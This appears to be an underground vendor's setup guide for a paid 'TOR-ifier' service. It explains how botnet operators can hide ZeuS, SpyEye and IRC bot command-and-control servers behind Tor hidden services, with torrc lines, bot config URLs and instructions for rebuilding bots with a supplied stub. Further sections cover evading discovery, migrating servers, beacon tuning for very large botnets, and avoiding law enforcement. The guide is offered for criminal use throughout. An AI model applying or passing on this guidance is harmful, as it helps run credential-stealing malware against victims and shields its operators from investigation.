ratNetw0rk Statistik

TOR-ifier setup instructions (Englisch)


TOR-ifier setup instructions

1. Configuring your C&C server
   1.1)   Install the C&C server part of your botnet as you usually do.
   1.2)   Find out the port the webpanel/irc-server/collector listens on (e.g.

Apache = 80, Unrealircd = 6667, collector = 443).

1.3) Install TOR.
1.3.1. Linux: sudo apt-get install tor
1.3.2. Windows: download and install from www.torproject.org

1.4)      Configure TOR.
1.4.1.   Linux: vim /etc/tor/torrc
1.4.2.   Windows: open %appdata%/tor/torrc with notepad

1.5)      Add these lines (You can choose any port (1-65535) for 12345):
1.5.1.    Linux:
      HiddenServiceDir /var/lib/tor/zeusbot
      HiddenServicePort 12345 127.0.0.1:80

1.5.2.    Windows:
   HiddenServiceDir C:\Users\Admin\AppData\Roaming\tor\zeusbot
   HiddenServicePort 12345 127.0.0.1:80

1.5.3.    This is for a http server on port 80, for IRC e.g. use 6667 instead of 80
1.5.4.    If you need multiple ports (e.g. SpyEye collector) add another
   HiddenServicePort line with another random port:
   HiddenServiceDir /var/lib/tor/spyeye
   HiddenServicePort 12345 127.0.0.1:80
   HiddenServicePort 12346 127.0.0.1:443

1.6)      Restart TOR
1.6.1.   Linux: sudo service tor restart
1.6.2.   Windows: close the tor.exe and start it again

1.7)     Open the directory you used for HiddenServiceDir in Step 1.5 and
   open the file hostname.

1.7.1.     This *.onion domain is your personal domain, note it down!
1.7.2.     Backup the private_key file and keep it safe, whoever has this file can control
    the *.onion domain and your botnet!

2. Making your order
2.1)     Contact us and give us the ports you choosed in 1.5 and your *.onion
   domain in 1.7
2.2)     We will give you your own stub and bridge.dat for your config and a
   builder.

3. Upgrading your Bot
3.1)   Build your Bot as usual, but choose 127.0.0.1:*port from 1.5* as
   C&C server.

3.1.1.   ZeuS:
   url_config "http://127.0.0.1:12345/config.bin"
   url_loader "http://127.0.0.1:12345/bot.exe"
   url_server "http://127.0.0.1:12345/gate.php"

3.1.2.     SpyEye:
   Path to the main control panel:
   ''http://127.0.0.1:12345/spyeye/main/gate.php''
   Path to the SpyEye Collector:
   ''127.0.0.1:12346''

3.1.3.  Some IRCBot:
   IRCServer: 127.0.0.1:12345

3.2)     Upgrade your bot.exe using your stub and bridge.dat . (Some Bots
   like ZeuS require EOF support, just activate it in the builder)

4. Hack the planet and get your money!

5. Security advise (not necessary):
5.1)     Block the port of your webpanel/ircserver/etc so noone can reach it
   from the non-TOR internet otherwise someone could accidentally find your
   C&C server! You can still manage your botnet using a ssh tunnel.

5.2)      Keep the private_key file save! If you loose it, you will loose control
   of the domain and your bots!

6. Cool tricks with your new TOR-Botnet
6.1) Moving your C&C to a new server:
       You can easily redirect your *.onion to a new server location in minutes!
       Copy your torrc and your HiddenServiceDir to TOR directory on the new
       server. (Make sure you copied hostname and private_key)
       Stop TOR on the old server!
       Restart TOR on your new server.
       If everything is ok delete the TOR directory on the old server

7. Additional notes
   7.1)   IRC Botnet
   7.1.1.   On some IRC Servers like unrealircd you need to change
   ''maxperip'' in the allow block, because every bot will have the same IP
   (127.0.0.1). Just change it to ''maxperip 65000;'' and you will be fine.

   7.1.2.    NEVER EVER ban an IRC bot using the hostmask! If you ban
   one, all of them will be banned, because they share the same IP!

7.2) ZeuS/SpyEye
7.2.1.   Only the collected data and commands will be routed through
   TOR. Backconnect, Socks, FTP, RDP and so on will work as usual, so
   only use bulletproof servers for this functions!

7.2.2.   Use higher delays for commands/logs. Asking for commands
   every 60 seconds wont work on TOR and will crash your server anyway.
   10 Minutes delay for commands/logs and 60 Minutes for Config/Binary
   update will do fine.

7.2.3.   TOR has higher latency (~2000ms) but the speed is still fine for a
   botnet (~60kByte/s)

7.3)      If you wanna route a HUGE botnet (~1mio Bots) you should donate
   some TOR relays/nodes to the TOR Project! Setting up a TOR relay/node is
   perfectly legal and will help people wanting anonymity on the internet and
   will speed up your botnet! https://www.torproject.org/docs/tor-doc-relay.html.en

8. FAQ
   Why is it secure?
   Because noone will know which IP the traffic goes to. Your Server-IP wont show up
   anywhere!

But I heard there was some talk about sniffing TOR...
It was about sniffing TOR-Exitnodes. Traffic inside the TOR-Net is always encrypted, but
when it leaves the TOR-Net to the regular Internet, it must be decrypted and can therefor be
sniffed. Your botnet traffic never leaves the TOR-Net it stays inside and can never be
sniffed!

But is it secure enough for the FBI/CIA/*InsertAgencyHere* ?
Hey, it's secure enough for wikileaks, right?

Where can I get more info?
There was a talk at Defcon18 about exactly this topic:
http://www.youtube.com/watch?v=Vfl_fv3kLW0
http://www.youtube.com/watch?v=BwtZ1J1gHO8
http://www.youtube.com/watch?v=XPcVaA2Y4cw